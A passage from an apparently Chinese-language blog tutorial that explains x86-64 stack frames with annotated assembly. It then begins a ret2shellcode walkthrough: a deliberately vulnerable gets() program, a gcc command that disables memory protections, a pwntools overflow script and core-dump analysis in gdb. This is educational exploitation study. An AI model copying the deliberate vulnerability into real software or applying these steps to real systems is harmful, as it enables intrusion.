class="mrel">:</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace nobreak"> </span><span class="mord">1</span><span class="mspace nobreak"> </span><span class="mord mathdefault" style="margin-right:0.05017em;">B</span><span class="mord mathdefault" style="margin-right:0.03588em;">y</span><span class="mord mathdefault">t</span><span class="mord mathdefault">e</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace nobreak"> </span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace nobreak"> </span><span class="mord">8</span><span class="mspace nobreak"> </span><span class="mord mathdefault">b</span><span class="mord mathdefault">i</span><span class="mord mathdefault">t</span><span class="mord mathdefault">s</span><span class="mclose">)</span></span></span></span>。上面的每一类寄存器除了首字母外都相同表示的就是对于同样的这个64位寄存器，我使用到其中的多少位(或者比特)，其中对于通用寄存器(除了拓展寄存器等之外的)一般有这个规律</p>
<p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math><semantics><mrow><mi>r</mi><mo>−</mo><mtext>  </mtext><mo>⟺</mo><mtext>  </mtext><mtext>64位全用</mtext><mspace width="3em"></mspace><mi>e</mi><mo>−</mo><mtext>  </mtext><mo>⟺</mo><mtext>  </mtext><mtext>只用32位</mtext></mrow><annotation encoding="application/x-tex">r-\iff\text{64位全用} \hspace{3em} e-\iff\text{只用32位}
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.66666em;vertical-align:-0.08333em;"></span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">⟺</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord text"><span class="mord">64</span><span class="mord cjk_fallback">位全用</span></span><span class="mspace" style="margin-right:3em;"></span><span class="mord mathdefault">e</span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">⟺</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord text"><span class="mord cjk_fallback">只用</span><span class="mord">32</span><span class="mord cjk_fallback">位</span></span></span></span></span></span></p>
<h2 id="内存分布的一些知识"><a class="markdownIt-Anchor" href="#内存分布的一些知识"></a> 内存分布的一些知识</h2>
<hr>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/memory.png" class="" title="内存的分布">
</div>
<p>每次代码编译成二进制文件都会被切分成几个部分，包括汇编指令的代码区，包含一些预设的const常量的静态区，以及可以动态管理的堆区与栈区。<br>
但是程序是需要一块动态的连续区域来保存记录程序当前的运行状态，这里就是所谓的运行栈。按照我的理解，就是因为堆区选择了高自由度的随时分配与随时释放，所以把运行状态记录的责任交给了栈。<br>
通常的，我们将每次调用的函数称为一个过程的活动(过程调用)。每次过程调用所用到的过程栈称为一个栈帧。其中一个栈帧的栈底的地址保存在帧指针寄存器里面，一个栈帧的栈顶的地址保存在栈指针寄存器里面。一个具体的栈帧的图片如下</p>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack%20frame.jpg" class="">
</div>
<p>如图所示，栈向低地址(0x00000000)方向“向下生长”(其中具有关于C语言的一些历史原因 bushi)。前面提到，每个活动(函数调用)都会创建一个独立的栈帧作为执行的“工作区”。它是连接调用者与被调用者的纽带，主要存储以下关键信息：</p>
<ul>
<li>一是函数的返回地址，由于栈帧相当于函数调用的草稿纸，但是这一块草稿纸与待执行的代码同样在内存上，所以这里面记录了CPU完成本次函数之后需要执行的下一条指令的内存地址，以方便CPU自动(注意这里无法手动操作)将其传入<code>%rip/%eip</code></li>
<li>二是保存的 <strong>调用此函数的对象的栈帧的指针</strong> 这是为了方便CPU完成本次函数的时候同步修改<code>%rbp/%ebp</code>值以回到上一题的草稿纸状态</li>
<li>三是可能的函数参数，前面提到了：CPU中有6个整数寄存器可以用来传递前6个整数参数(或者字符串的地址等地址参数)，同理也有8个浮点参数寄存器<span class="katex"><span class="katex-mathml"><math><semantics><mrow><mo stretchy="false">(</mo><mi mathvariant="normal">%</mi><mi>X</mi><mi>M</mi><mi>M</mi><mn>0</mn><mo>−</mo><mi mathvariant="normal">%</mi><mi>X</mi><mi>M</mi><mi>M</mi><mn>7</mn><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">(\%XMM0-\%XMM7)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">(</span><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.07847em;">X</span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord">0</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.07847em;">X</span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord">7</span><span class="mclose">)</span></span></span></span>，那如果还有多余的参数没有参数寄存器使用的话，就会需要在新的栈帧上先将这些参数保存，然后通过<code>%rbp</code>的偏移去访问。</li>
<li>四是一些声明的局部非堆变量(已经确定大小)</li>
</ul>
<h3 id="结合实例理解栈帧结构"><a class="markdownIt-Anchor" href="#结合实例理解栈帧结构"></a> 结合实例理解栈帧结构</h3>
<p>一个很简单的小程序，实现了函数调用，参数传递，解指针，其汇编代码如右图所示 关闭RELRO(重定位只读)，STACK CANARY(金丝雀值)，NX(内存页不可执行)，PIE(位置无关可执行文件)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">do_something</span><span class="params">(<span class="type">int</span> *a,<span class="type">int</span>*b)</span>{</span><br><span class="line">    <span class="keyword">return</span> *a + *b;</span><br><span class="line">}</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>{</span><br><span class="line">    <span class="type">int</span> x = <span class="number">10</span>;</span><br><span class="line">    <span class="type">int</span> y = <span class="number">20</span>;</span><br><span class="line">    <span class="type">int</span> result = do_something(&amp;x,&amp;y);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"The result is: %d\n"</span>, result);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>使用GCC编译器使其停留在可读的汇编代码阶段得到(下述代码还没优化过，同时只保留了主干逻辑部分)</p>
<div style="display: flex; gap: 20px; flex-wrap: wrap;">
  <div style="flex: 1; min-width: 200px; background: #D0D7DE; padding: 20px;">
  <figure class="highlight as"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">  do_something:</span><br><span class="line">.LFB0:</span><br><span class="line">	.cfi_startproc ; 调试器生成的调试参数</span><br><span class="line">	endbr64</span><br><span class="line">	pushq	%rbp</span><br><span class="line">	.cfi_def_cfa_offset <span class="number">16</span> ; 调试器生成的调试参数</span><br><span class="line">	.cfi_offset <span class="number">6</span>, <span class="number">-16</span> ; 调试器生成的调试参数</span><br><span class="line">	movq	%rsp, %rbp</span><br><span class="line">	.cfi_def_cfa_register <span class="number">6</span> ; 调试器生成的调试参数</span><br><span class="line">	movq	%rdi, <span class="number">-8</span>(%rbp)</span><br><span class="line">	movq	%rsi, <span class="number">-16</span>(%rbp)</span><br><span class="line">	movq	<span class="number">-8</span>(%rbp), %rax</span><br><span class="line">	movl	(%rax), %edx</span><br><span class="line">	movq	<span class="number">-16</span>(%rbp), %rax</span><br><span class="line">	movl	(%rax), %eax</span><br><span class="line">	addl	%edx, %eax</span><br><span class="line">	popq	%rbp</span><br><span class="line">	.cfi_def_cfa <span class="number">7</span>, <span class="number">8</span> ; 调试器生成的调试参数</span><br><span class="line">	ret</span><br><span class="line">	.cfi_endproc ; 调试器生成的调试参数</span><br><span class="line">.LFE0:</span><br><span class="line">	.size	do_something, .-do_something</span><br><span class="line">	.section	.rodata</span><br><span class="line">.LC0:</span><br><span class="line">	.string	<span class="string">"The result is: %d\n"</span></span><br><span class="line">	.text</span><br><span class="line">	.globl	main</span><br><span class="line">	.type	main, @<span class="keyword">function</span></span><br></pre></td></tr></table></figure>
  </div>
  <div style="flex: 1; min-width: 200px; background: #D0D7DE; padding: 20px;">
  <figure class="highlight as"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">  main:</span><br><span class="line">.LFB1:</span><br><span class="line">	.cfi_startproc ; 调试器生成的调试参数</span><br><span class="line">	endbr64 ; Intel强制规范，要求jmp指令只能间接跳转到有这个标记endbr的地方</span><br><span class="line">	pushq	%rbp</span><br><span class="line">	.cfi_def_cfa_offset <span class="number">16</span> ; 调试器生成的调试参数</span><br><span class="line">	.cfi_offset <span class="number">6</span>, <span class="number">-16</span> ; 调试器生成的调试参数</span><br><span class="line">	movq	%rsp, %rbp</span><br><span class="line">	.cfi_def_cfa_register <span class="number">6</span> ; 调试器生成的调试参数</span><br><span class="line">	subq	$<span class="number">16</span>, %rsp</span><br><span class="line">	movl	$<span class="number">10</span>, <span class="number">-8</span>(%rbp)</span><br><span class="line">	movl	$<span class="number">20</span>, <span class="number">-12</span>(%rbp)</span><br><span class="line">	leaq	<span class="number">-12</span>(%rbp), %rdx</span><br><span class="line">	leaq	<span class="number">-8</span>(%rbp), %rax</span><br><span class="line">	movq	%rdx, %rsi</span><br><span class="line">	movq	%rax, %rdi</span><br><span class="line">	call	do_something</span><br><span class="line">	movl	%eax, <span class="number">-4</span>(%rbp)</span><br><span class="line">	movl	<span class="number">-4</span>(%rbp), %eax</span><br><span class="line">	movl	%eax, %esi</span><br><span class="line">	leaq	.LC0(%rip), %rax ; 见解释<span class="number">3</span></span><br><span class="line">	movq	%rax, %rdi</span><br><span class="line">	movl	$<span class="number">0</span>, %eax</span><br><span class="line">	call	printf@PLT</span><br><span class="line">	movl	$<span class="number">0</span>, %eax</span><br><span class="line">	leave ; 函数返回前恢复调用者的栈帧</span><br><span class="line">	.cfi_def_cfa <span class="number">7</span>, <span class="number">8</span> ; 调试器生成的调试参数</span><br><span class="line">	ret</span><br><span class="line">	.cfi_endproc ; 调试器生成的调试参数</span><br></pre></td></tr></table></figure>
  </div>
</div>
<p><strong>注：<code>push</code>,<code>mov</code>,<code>lea</code> 这些指令后面的<code>l</code>表示(long 代表操作的对象是32位 4字节)  后面如果带有<code>q</code>(quad 代表操作的对象是64位 8字节)</strong><br>
解释：</p>
<ol>
<li><code>$8</code> : 代表直接使用<code>8</code>这个数，称为立即数</li>
<li><code>-8(%rbp)</code> : 代表从<code>%rbp</code>寄存器中取出地址值，然后将这个地址值减去8个字节后，所指向的内存单元里的数据。(注：内存的储存以一个字节，8位二进制数，作为基本单位)</li>
<li>AT&amp;T 语法的 leaq（Load Effective Address），作用是将标签 .LC0 的运行时地址加载到寄存器 %rax 中，而不是读取该地址处存放的内容。</li>
</ol>
<p>部分汇编代码注解：</p>
<ul>
<li><code>call</code> 	将下一条指令的地址压栈，并跳转到目标地址</li>
<li><code>push</code>	压栈同时 %rsp 减 $8</li>
<li><code>mov</code>	移动寄存器或栈上数据	<code>mov source,destination</code></li>
<li><code>sub</code>	后面的寄存器减去第一操作数</li>
<li><code>lea</code>	将源操作数的地址存入寄存器	<code>lea registers,[addr]</code></li>
</ul>
<p>此时整个程序的栈上结构如下面几组图所示，其中包含了<code>main(void)</code>与<code>do_something(int *a,int *b)</code>两个函数的各自的栈帧</p>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/main_part1.png">
</div>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/do_something.png">
</div>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/ret_do_something.png">
<div style="text-align: center;color: red;"><strong>纠错：此处执行ret之后%rsp还要再+8位上移</strong></div>
</div>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/ret_main.png">
<div style="text-align: center; color: red;"><strong>纠错：此处%rsp应当是指在23的位置</strong></div>
</div>
<p>这个实例告诉我们：栈的组织与管理是直接与汇编码(乃至机器码)相关的，机器码的一大核心功能就是完成栈结构的自动组织与维护。同时栈也通过保存<code>%rbp</code>内容、返回地址等方式间接参与了控制流的管理，因为栈可以看作是部分数据与控制的结合，这也就给我们通过数据篡改控制留下了可能。</p>
<h2 id="正文栈溢出缓冲区溢出的一种"><a class="markdownIt-Anchor" href="#正文栈溢出缓冲区溢出的一种"></a> 正文：栈溢出(缓冲区溢出的一种)</h2>
<hr>
<p>缓冲区溢出是最经典、最危险的一类漏洞。在栈上的缓冲区溢出叫做栈溢出。其原理是向栈上的缓冲区（如字符数组）写入超出其容量的数据，从而覆盖栈帧中后续的关键数据，特别是返回地址，进而劫持程序执行流。<strong>按照我个人的观点，其原因一部分在于写入数组的增长方向与栈的增长方向相反，而核心原因是栈同时兼具了数据存储、控制流等多种功能</strong></p>
<p>下面展示的是一个简单的小程序</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// file: showcase.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">vulnerable</span><span class="params">()</span> {</span><br><span class="line">    <span class="type">char</span> my_buffer[<span class="number">64</span>];</span><br><span class="line">    gets(my_buffer);  <span class="comment">// GCC编译器认定的极其危险的 -w 函数，无边界检查</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> {</span><br><span class="line">    vulnerable();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Returned safely.\n"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>编译的时候关闭关闭了栈溢出保护（Stack Canary）、控制流保护（Intel CET）、代码段地址随机化（PIE/ASLR）、栈不可执行（NX）、重定位只读保护（RELRO）、关闭所有编译警告 <strong>看的出来为了防止以缓冲区溢出为首的内存破坏实在是下了不少功夫(bushi)</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -fno-stack-protector -fcf-protection=none -no-pie -z execstack -z norelro -w showcase.c -o showcase</span><br></pre></td></tr></table></figure>
<p>结合汇编代码与反编译器(IDA Pro)得到其危险函数<code>vulnerable()</code>栈帧结构</p>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack_frame.png">
</div>
<p>计算得到我们需要覆盖的返回地址与字符串数组的起始处一共有 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mn>64</mn><mo>+</mo><mn>8</mn><mo>=</mo><mn>72</mn></mrow><annotation encoding="application/x-tex">64+8=72</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.72777em;vertical-align:-0.08333em;"></span><span class="mord">6</span><span class="mord">4</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">8</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">7</span><span class="mord">2</span></span></span></span> 字节的距离，也就是我们需要构造的Payload的大致架构为</p>
<p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext>72字节的其他内容</mtext><mo>+</mo><mtext>8字节的恶意返回地址</mtext></mrow><annotation encoding="application/x-tex">\text{72字节的其他内容} + \text{8字节的恶意返回地址}
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord text"><span class="mord">72</span><span class="mord cjk_fallback">字节的其他内容</span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord text"><span class="mord">8</span><span class="mord cjk_fallback">字节的恶意返回地址</span></span></span></span></span></span></p>
<p>我们这里希望实现一个拿到 <code>shell</code> 的功能，同时考虑到这个程序中没有一段写好的代码可以直接调用shell，所以我们打算在前面的72字节的其他内容填入调用 <code>Linux</code> 下的shell的代码。同时考虑到每次程序运行的时候没有开启ASLR(基址虚拟化)的功能，意味着每次程序执行的时候，需要保证执行的环境相同，则大概率栈的地址不会有太大变动(因为即使关闭了ASLR，栈的起始地址也会因为运行参数、环境变量个数、父进程残留、已经少数情况下内核版本差异导致不同)<br>
前面提到了关于运行环境的问题，如果一开始就使用gdb调试器拿到的栈地址肯定是不准确的，因为调试器往往会先往栈上写入一些东西，这与我们直接运行程序时候的环境不一样。我们换一种思路，先正常启动程序，然后通过简单的栈溢出，破坏程序的控制流，使得内核终止程序执行，并留下core_dumped文件内容，然后利用调试器读取内容，找到我们写入的栈上的内存地址。首先解除core文件的大小限制。因为默认情况下，系统为了节省磁盘空间，会将 core dump 文件的大小限制为 0（即禁止生成）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ulimit</span> -c unlimited</span><br></pre></td></tr></table></figure>
<p>这里使用python的pwn库实现功能，首先由于WSL环境的限制，在Windows挂载目录下，即使开启了core_dumped文件留下也无法正常写入，我们先将内容copy到WSL的原生文件夹下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> ~/CTF_pre </span><br><span class="line"><span class="built_in">cp</span> ./showcase ~/CTF_pre</span><br></pre></td></tr></table></figure>
<p>然后写一个这样的脚本，其核心作用就是往这个程序中输入超过缓冲区的字符，使得<code>Saved %rbp</code>与返回地址同时无效</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># file:pay.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">"./showcase"</span>)</span><br><span class="line">p.sendline(<span class="string">b"\x90"</span>*<span class="number">80</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/overflow.png">
</div>
<p>注意这里提示内核抛出SIGSEGV信号，同时以-11作为退出码退出，这里SIGSEGV表示程序试图访问不允许访问的内存区域，也就是说<code>vulnerable()</code>结尾的时候</p>
<figure class="highlight as"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">leave    ; 等价于 mov %rbp, %rsp   ; pop %rbp</span><br><span class="line">ret      ; 从栈上弹出返回地址，写入 %rip</span><br></pre></td></tr></table></figure>
<p>执行到 <code>leave</code> 时， <code>Saved %rbp</code> 已经因栈溢出变成了 <code>0x9090909090909090</code>接下来执行 <code>leave</code> 指令的详细细节</p>
<ol>
<li><code>mov %rbp, %rsp</code>:<br>
把 <code>%rbp</code> 的值（当前正常的帧指针）复制到 <code>%rsp</code>。</li>
<li><code>pop %rbp</code>:<br>
试图从当前 <code>%rbp</code> 指向的内存位置读取 8 字节，并存入 <code>%rbp</code>。同时使得 <code>%rsp</code> 值加8上移。由于此时 <code>Saved %rbp</code> 也即 <code>0x9090909090909090</code> ，所以此时的 <code>%rbp=0x9090909090909090</code><br>
然后接下来执行 <code>ret</code> 指令，也就是 <code>popq %rip</code> 的相同语义形式(实际不可能这么写)，它试图从栈中读取下一条要执行的地址赋值给 <code>%rip</code>，查询资料得知这个时候触发了 x86-64 架构的安全限制</li>
</ol>
<details><summary>🔖 Canonical Address 机制</summary><p>当 AMD 最早设计 x86-64 架构时，如果真的完整实现 64 位的虚拟地址寻址，意味着它可以寻址高达 16 EB（Exabytes，约 1600万 TB）的内存。<br>
但在当时（乃至现在），没有任何系统需要这么大的内存。如果直接在 CPU 硬件里实现完整的 64 位寻址，会带来巨大的负担：</p>
<ul>
<li><strong>页表查找开销（Page Table Walk）：</strong> 完整的 64 位寻址需要 6 级页表。页表级数越多，当 TLB（页表缓存）未命中时，CPU 遍历内存查找页表的次数就越多，性能损耗非常大。</li>
<li><strong>硬件成本：</strong> 支持更宽的地址线、更大的缓存和更复杂的 MMU（内存管理单元）会增加芯片面积和功耗。</li>
</ul>
<p>因此，AMD 选择了一个折中方案：<strong>寄存器是 64 位的，但最初的硬件实现只使用低 48 位作为有效的虚拟地址</strong>。48 位可以提供 256 TB 的虚拟地址空间，这在过去和当前的一般应用中已经完全足够了。</p>
<h2 id="1-4-级页表结构pml4"><a class="markdownIt-Anchor" href="#1-4-级页表结构pml4"></a> 1. 4 级页表结构（PML4）</h2>
<p>在 Linux 和 Windows 系统中，传统的 x86-64 使用 <strong>4 级页表（4-level paging）</strong> 来管理内存。每级页表占用 9 位，加上 12 位的页内偏移（Page Size = 4KB）：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">9 + 9 + 9 + 9 + 12 = 48 位</span><br></pre></td></tr></table></figure>
<p>这就决定了通过 4 级页表能够映射的虚拟地址极限正好是 48 位。</p>
<h2 id="2-canonical-address规范地址规则的设计"><a class="markdownIt-Anchor" href="#2-canonical-address规范地址规则的设计"></a> 2. Canonical Address（规范地址）规则的设计</h2>
<p>为了给未来扩展留出余地（比如以后需要升级到 52 位或 64 位），并且不破坏当时编写的软件兼容性，x86-64 架构引入了 Canonical Address（规范地址） 的强制性规则：<br>
虽然只用 48 位，但 CPU 在检查一个 64 位指针时，要求 第 48 位到第 63 位（高 16 位）必须是第 47 位（最高有效位）的符号扩展（完全复制）。<br>
换句话说，高 16 位要么全是 0，要么全是 1：</p>
<ul>
<li>全 0（用户空间）： 从 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0x0000000000000000</mtext></mrow><annotation encoding="application/x-tex">\texttt{0x0000000000000000}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0x0000000000000000</span></span></span></span></span> 到 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0x00007FFFFFFFFFFF</mtext></mrow><annotation encoding="application/x-tex">\texttt{0x00007FFFFFFFFFFF}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0x00007FFFFFFFFFFF</span></span></span></span></span>（128 TB）。</li>
<li>全 1（内核空间）： 从 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0xFFFF800000000000</mtext></mrow><annotation encoding="application/x-tex">\texttt{0xFFFF800000000000}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0xFFFF800000000000</span></span></span></span></span> 到 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0xFFFFFFFFFFFFFFFF</mtext></mrow><annotation encoding="application/x-tex">\texttt{0xFFFFFFFFFFFFFFFF}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0xFFFFFFFFFFFFFFFF</span></span></span></span></span>（128 TB）。</li>
</ul>
<p>这中间巨大的空隙（从 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0x00008000...</mtext></mrow><annotation encoding="application/x-tex">\texttt{0x00008000...}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0x00008000...</span></span></span></span></span> 到 <span class="katex"><span class="katex-mathml"><math><semantics><mrow><mtext mathvariant="monospace">0xFFFF7FFF...</mtext></mrow><annotation encoding="application/x-tex">\texttt{0xFFFF7FFF...}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.61111em;vertical-align:0em;"></span><span class="mord text"><span class="mord texttt">0xFFFF7FFF...</span></span></span></span></span>）被称为非规范地址空间（Non-canonical address space）。</p>
<p><em>注：近几年的较新 CPU 如 Intel Ice Lake 或 AMD Zen 3 引入了 5 级页表，将虚拟地址扩展到了 57 位，但底层的 Canonical Address 规则依然适用，只是从 48 位扩展到了 57 位的符号扩展。</em></p>
</details>
<ul>
<li>在 x86-64 中，虽然寄存器是 64 位的，但当前 CPU 的虚拟地址空间实际只使用了 48 位(主机CPU ：AMD R7 4800U zen2 架构)。</li>
<li>CPU 要求所有内存地址必须是规范地址（Canonical），即地址的第 48 位到 63 位必须与第 47 位（符号位）完全一致（要么全 0，要么全 1）。</li>
<li>0x9090909090909090 显然不符合这个规范规则。<br>
当 ret 指令试图将一个非规范地址（Non-canonical address）加载到 %rip 时，CPU 会直接拒绝执行跳转，并立即引发一个一般保护异常（General Protection Fault, #GP），这会被操作系统转换为 SIGSEGV 信号。</li>
</ul>
<p>接下来拿到core之后我们启动gdb，加载这个core文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb ./showcase core</span><br></pre></td></tr></table></figure>
<p>先检查registers是否与我们的预想一致</p>
<div style="display: block;margin: auto">
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/info_registers.png">
</div>
<p>结果与我们预想的一致，接下来我们使用 <code>x/100gx $rsp - 100</code> 查看从当前的 <code>%rsp</code> 的位置往低地址方向走100字节之后，向着高字节以每8字节(64位，16个16进制数)为一组，小端序(高位在左，低位在右)展示每一组</p>
